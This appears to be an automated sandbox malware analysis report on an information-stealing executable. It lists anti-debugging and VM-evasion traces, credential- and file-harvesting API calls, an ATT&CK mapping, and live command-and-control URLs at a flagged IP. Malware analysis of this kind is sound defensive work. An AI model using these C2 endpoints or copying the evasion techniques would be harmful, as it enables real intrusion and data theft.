                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C751 second address: D8C765 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FD2D0DFA0CEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D988F6 second address: D98900 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD2D0B60AE6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D98BB6 second address: D98BBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9901D second address: D99026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 pop edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D99026 second address: D9902B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9995E second address: D9996F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FD2D0B60AE6h 0x0000000a jne 00007FD2D0B60AE6h 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9996F second address: D99975 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D99975 second address: D99979 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEC162 second address: DEC176 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD2D1555D28h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push esi 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop esi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEBF9E second address: DEBFB0 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD2D04F5C18h 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007FD2D04F5C16h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEBFB0 second address: DEBFBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEBFBD second address: DEBFC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEBFC3 second address: DEBFD6 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD2D1555D26h 0x00000008 js 00007FD2D1555D26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF3E73 second address: DF3E78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E01151 second address: E0117A instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD2D1555D32h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD2D1555D2Eh 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0147C second address: E01486 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD2D04F5C16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E01486 second address: E01490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E01490 second address: E014A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2D04F5C1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E015EF second address: E015F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0178B second address: E017BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FD2D04F5C26h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jno 00007FD2D04F5C18h 0x00000014 push eax 0x00000015 push edx 0x00000016 jnc 00007FD2D04F5C16h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E017BA second address: E017BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0190B second address: E01911 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E02641 second address: E0264C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FD2D1555D26h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0537D second address: E05382 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E05382 second address: E053A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jns 00007FD2D1555D26h 0x0000000e jmp 00007FD2D1555D2Ch 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E2FB second address: E0E31E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2D04F5C29h 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FD2D04F5C16h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E31E second address: E0E322 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1F0D3 second address: E1F111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jnl 00007FD2D04F5C16h 0x0000000c popad 0x0000000d jmp 00007FD2D04F5C25h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007FD2D04F5C26h 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1F111 second address: E1F11C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push esi 0x00000006 pop esi 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E330F8 second address: E3311C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FD2D04F5C16h 0x0000000a popad 0x0000000b jmp 00007FD2D04F5C29h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E332A3 second address: E332C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jnc 00007FD2D1555D34h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E332C0 second address: E332C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E33422 second address: E33432 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FD2D1555D2Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3357C second address: E33580 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E33580 second address: E33588 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3393C second address: E33942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E33942 second address: E33948 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E33A85 second address: E33A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E35843 second address: E3584F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FD2D1555D26h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3584F second address: E3586C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FD2D04F5C28h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E380CF second address: E380D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FD2D1555D26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E383F6 second address: E383FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E383FC second address: E38400 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E38400 second address: E3840D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3840D second address: E38415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E39ECE second address: E39ED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E39ED4 second address: E39EEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FD2D1555D2Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB02BC second address: 4CB0320 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD2D04F5C1Bh 0x00000009 add si, 929Eh 0x0000000e jmp 00007FD2D04F5C29h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 jmp 00007FD2D04F5C1Eh 0x0000001d push eax 0x0000001e jmp 00007FD2D04F5C1Bh 0x00000023 xchg eax, ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FD2D04F5C25h 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0320 second address: 4CB0330 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD2D1555D2Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB03F5 second address: 4CB03FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 7EB6B6B4h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: BB179D instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: BB1870 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: D7D000 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: DDA350 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009638B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_009638B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00964910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00964910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0095DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0095DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0095E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0095E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0095ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0095ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00964570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00964570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0095F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0095F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00963EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00963EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009516D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_009516D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0095DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0095DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0095BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0095BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00951160 GetSystemInfo,ExitProcess,0_2_00951160
                Source: file.exe, file.exe, 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1721406629.0000000000612000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1721406629.00000000005E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1721406629.000000000059E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13550
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13547
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13561
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13601
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13569
Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformation

                Anti Debugging

Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009545C0 VirtualProtect ?,00000004,00000100,000000000_2_009545C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00969860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00969860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00969750 mov eax, dword ptr fs:[00000030h]0_2_00969750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009678E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_009678E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exeMemory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara matchFile source: Process Memory Space: file.exe PID: 2316, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00969600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00969600
                Source: file.exeBinary or memory string: : 'Program Manager
                Source: file.exe, 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 'Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00967B90
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00967980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00967980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00967850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00967850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00967A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00967A30

                Stealing of Sensitive Information

                Source: Yara matchFile source: 0.2.file.exe.950000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1721406629.000000000059E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1680234498.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 2316, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara matchFile source: 0.2.file.exe.950000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1721406629.000000000059E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1680234498.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 2316, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter
                1
                DLL Side-Loading
                11
                Process Injection
                1
                Masquerading
                OS Credential Dumping2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                2
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                33
                Virtualization/Sandbox Evasion
                LSASS Memory641
                Security Software Discovery
                Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools
                Security Account Manager33
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection
                NTDS13
                Process Discovery
                Distributed Component Object ModelInput Capture12
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information
                LSA Secrets1
                Account Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information
                Cached Domain Credentials1
                System Owner/User Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing
                DCSync1
                File and Directory Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading
                Proc Filesystem324
                System Information Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
http://185.215.113.37/e2b1563c6670f193.phpN17%Virustotal
http://185.215.113.37/p17%Virustotal
http://185.215.113.37/ws17%Virustotal
http://185.215.113.37/e2b1563c6670f193.phpy17%Virustotal
                No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/ | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware; URL Reputation: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/e2b1563c6670f193.phpN | file.exe, 00000000.00000002.1721406629.00000000005F6000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/p | file.exe, 00000000.00000002.1721406629.00000000005F6000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37= | file.exe, 00000000.00000002.1721406629.000000000059E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37 | file.exe, 00000000.00000002.1721406629.000000000059E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.37/ws | file.exe, 00000000.00000002.1721406629.00000000005F6000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpy | file.exe, 00000000.00000002.1721406629.00000000005F6000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
185.215.113.37 | unknown | Portugal | | 206894 | WHOLESALECONNECTIONSNL | true
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1524645
                  Start date and time:2024-10-03 03:00:07 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 3m 14s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
